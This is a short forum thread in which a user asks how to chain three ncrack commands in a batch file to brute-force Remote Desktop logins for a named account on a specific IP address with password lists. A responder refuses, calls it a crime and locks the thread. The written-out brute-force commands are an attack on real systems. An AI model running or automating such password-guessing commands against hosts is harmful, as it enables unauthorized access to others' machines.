1.

Solve : how to run automaticaly multiple syntax using cmd.exe?

Answer»

how to run this? one by one
I OPEN cmd.exe and i paste MANUALLY that code one by one how to run this 3 string automatically in a batch file?
After 1'st list finishing starts the second and then starting the 3'rd
ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
ncrack -v --user Amin -P super3.txt 5.2.182.200:3389


i tried this but not good results

[emailprotected]
start /wait ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
start /wait ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
start /wait ncrack -v --user Amin -P super3.txt 5.2.182.200:3389



No help with cracking or bypassing SECURITY on this forum. What you are trying to do is a CRIME in most countries.



Thread locked.Well he was a fun guy...

BTW showed up in multiple Forums...



Discussion

No Comment Found